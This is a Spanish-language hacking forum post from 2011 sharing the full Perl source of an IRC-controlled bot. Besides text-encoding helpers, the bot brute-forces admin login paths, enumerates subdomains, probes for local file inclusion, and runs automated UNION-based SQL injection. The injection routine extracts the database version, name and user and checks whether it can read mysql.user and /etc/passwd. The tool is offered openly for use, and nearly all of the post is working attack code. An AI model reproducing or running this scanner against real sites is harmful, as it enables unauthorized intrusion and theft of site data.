elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Perl] Terr0r B0t By Doddy H		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Perl] Terr0r B0t By Doddy H  (Leído 2,141 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Perl] Terr0r B0t By Doddy H
« en: 7 Octubre 2011, 15:55 pm »
Hola a todos.

Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual
tiene las siguientes opciones :

* Codificacion y decodificacion de base64 , hex , ascii
* Buscar panel de administracion de algun sitio
* Scan SQLI  (busca numero de columnas y da info)
* Tool para explotar LFI

Comandos para el bot en el canal

Código:
!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1 
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='

Forma de uso :

Código:
C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online



Código
  1. #!usr/bin/perl
  2. #Terr0r B0t (C) Doddy Hackman 2010
  3. #Commands to use
  4. #
  5. #!base64 encode/decode string
  6. #!hex encode/decode string
  7. #!ascii encode/decode string
  8. #!panel http://127.0.0.1
  9. #!sqli http://127.0.0.1/sql.php?id=
  10. #!lfi http://127.0.0.1/lfi.php?file='
  11. #
  12. #
  13.  
  14.  
  15.  
  16.  
  17.  
  18. use IO::Socket;
  19. use LWP::UserAgent;
  20. use HTTP::Request::Common;
  21.  
  22.  
  23.  
  24. @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');
  25.  
  26.  
  27. @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');
  28.  
  29. my $nave = LWP::UserAgent->new();
  30. $nave->timeout(13);
  31. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  32.  
  33.  
  34. print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";
  35.  
  36. my $servidor = "127.0.0.1"; #Servidor IRC
  37. my $canal = "#locos"; #Canal IRC del servidor especificado
  38. my $nick = "Lepuke-Slave"; # Apodo del bot
  39. my $port = "6667"; # Puerto del servidor IRC
  40.  
  41. print "[+] Starting the bot\n";
  42.  
  43. my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
  44. PeerPort => $port,
  45. Proto => 'tcp' );
  46.  
  47. if (!$soquete) {
  48. print "\n[-] No se puedo conectar en $servidor $port\n";
  49. exit 1;
  50. }
  51.  
  52.  
  53. print $soquete "NICK $nick\r\n";
  54. print $soquete "USER $nick 1 1 1 1\r\n";
  55. print $soquete "JOIN $canal\r\n";
  56.  
  57. print "[+] Online\n\n";
  58.  
  59. while ( my $log = <$soquete> ) {
  60. chomp($log);
  61.  
  62. if ($log =~ /^PING(.*)$/i){
  63. print $soquete "PONG $1\r\n";
  64. }
  65.  
  66. if($log =~ m/:!panel (.*)$/g) {
  67. scan($1);
  68. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  69. }
  70.  
  71. if($log =~ m/:!sqli (.*)$/g) {
  72. print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
  73. scan2($1);
  74. }
  75.  
  76. if($log =~ m/:!fuzzdns (.*)$/g) {
  77. scan1($1);
  78. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  79. }
  80.  
  81. if($log =~ m/:!lfi (.*)$/g) {
  82. lfi($1);
  83. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  84. }
  85.  
  86.  
  87.  
  88. if($log =~ m/:!base64 (.*) (.*)$/g) {
  89. use MIME::Base64;
  90. my ($opcion,$aa) = ($1,$2);
  91. if ($opcion eq "encode") {
  92. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  93. print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
  94. }
  95. elsif ($opcion eq "decode") {
  96. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  97. print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
  98. }
  99. else {
  100. print $soquete "PRIVMSG $canal : ??\r\n";
  101. }
  102. }
  103.  
  104. if($log =~ m/:!ascii (.*) (.*)$/) {
  105. my ($opcion,$aa) = ($1,$2);
  106. chomp $aa;
  107. if ($opcion eq "encode") {
  108. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  109. print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
  110. }
  111. elsif ($opcion eq "decode") {
  112. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  113. print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
  114. }
  115. else {
  116. print $soquete "PRIVMSG $canal : ???\r\n";
  117. }
  118. }
  119.  
  120. if($log =~ m/:!hex (.*) (.*)$/) {
  121. my ($opcion,$aa) = ($1,$2);
  122. chomp $aa;
  123. if ($opcion eq "encode") {
  124. print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
  125. print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
  126. } 
  127. elsif ($opcion eq "decode") {
  128. print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
  129. print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
  130. }
  131. else {
  132. print $soquete "PRIVMSG $canal : ????\r\n";
  133. }
  134. }
  135. }
  136.  
  137. sub lfi { 
  138. print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
  139. print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
  140. $code = toma($_[0]);
  141. if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  142. print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
  143. print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
  144. print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
  145. for my $file(@buscar3) {
  146. $code1 = toma($_[0].$file);
  147. unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
  148. $ok = 1;
  149. print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
  150. }
  151. }
  152. unless($ok == 1) {
  153. print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
  154. }
  155. } else {
  156. print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
  157. }
  158. }
  159.  
  160.  
  161. sub scan1 {
  162. print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
  163. for my $path(@dns) {
  164. $code = tomax("http://".$path.".".$_[0]);
  165. if ($code->is_success) {
  166. print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
  167. }
  168. }
  169. }
  170.  
  171. sub scan {
  172. print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
  173. for my $path(@panels) {
  174. $code = tomax($_[0]."/".$path);
  175. if ($code->is_success) {
  176. print "\a";
  177. $ct = 1;
  178. print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
  179. }
  180. }
  181. if ($ct ne 1) { 
  182. print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
  183. }
  184. }
  185.  
  186.  
  187.  
  188. sub scan2 {
  189.  
  190. my $rows  = "0";
  191. my $asc;
  192. my $page = $_[0];
  193.  
  194. ($pass1,$pass2) = &bypass($ARGV[1]);
  195. $inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
  196. $code = toma($inyection);
  197. if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
  198. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
  199. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
  200. my $path = $1;
  201. chomp $path;
  202. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
  203. $total = "1";
  204. for my $rows(2..52) {
  205. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
  206. $total.= ",".$rows;
  207. $injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
  208. $test = toma($injection);
  209. if ($test=~/RATSXPDOWN/) {
  210. @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
  211. print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
  212. print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
  213. print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
  214. if ($test=~/RATSXPDOWN(\d+)/) {
  215. if ($path) {
  216. print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
  217. }
  218. $total=~s/@number[0]/hackman/;
  219. print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
  220. &details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
  221. last;
  222. }
  223. }
  224. }
  225. }
  226. } 
  227.  
  228. sub details {
  229. my $page = $_[0];
  230. ($pass1,$pass2) = &bypass($ARGV[1]);
  231. if ($page=~/(.*)hackman(.*)/ig) {
  232. my $start = $1; my $end = $2;
  233. $test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
  234. $test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
  235. $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
  236. if ($test2=~/ERTOR854/ig) {
  237. print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
  238. }
  239. if ($test1=~/ERTOR854/ig) {
  240. print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
  241. }
  242. if ($test3=~/ERTOR854/ig) {
  243. print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
  244. }
  245. $code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
  246. if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
  247. print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
  248. print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
  249. print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
  250. } else {
  251. print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
  252. }
  253. print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
  254. }
  255. }
  256. }
  257.  
  258. sub bypass {
  259. if ($_[0] eq "/*") { return ("/**/","/*"); }
  260. elsif ($_[0] eq "%20") { return ("%20","%00"); }
  261. else {return ("+","--");}}
  262.  
  263.  
  264. sub ascii {
  265. return join ',',unpack "U*",$_[0]; 
  266. }
  267.  
  268. sub ascii_de {
  269. $_[0] = join q[], map { chr } split q[,],$_[0];
  270. return $_[0];
  271. }
  272.  
  273.  
  274. sub encode {
  275. my $string = $_[0];
  276. $hex = '0x';
  277. for (split //,$string) {
  278. $hex .= sprintf "%x", ord;
  279. }return $hex;}
  280.  
  281. sub decode {
  282. $_[0] =~ s/^0x//;
  283. $encode = join q[], map { chr hex } $_[0] =~ /../g;
  284. return $encode;
  285. }
  286.  
  287. sub toma {
  288. return $nave->request (GET $_[0])->content;
  289. }
  290.  
  291. sub tomax {
  292. return $nave->request (GET $_[0]);
  293. }
  294.  
  295. #The End
  296.  
  297.  
  298.  
« Última modificación: 8 Octubre 2011, 19:09 pm por Doddy » En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Perl] Stalker By Doddy H
Scripting 		BigBear 2 2,945 Último mensaje 19 Octubre 2011, 22:47 pm
por BigBear
[Perl] Scan Port By Doddy H
Scripting 		BigBear 0 1,823 Último mensaje 7 Octubre 2011, 15:56 pm
por BigBear
[Perl] Reverse Shell By Doddy
Scripting 		BigBear 0 1,683 Último mensaje 8 Octubre 2011, 16:55 pm
por BigBear
[Perl] Pass Cracker By Doddy H
Scripting 		BigBear 0 1,441 Último mensaje 8 Octubre 2011, 16:56 pm
por BigBear
[Perl] Terr0r B0t 0.3
Scripting 		BigBear 0 1,494 Último mensaje 19 Enero 2012, 20:36 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines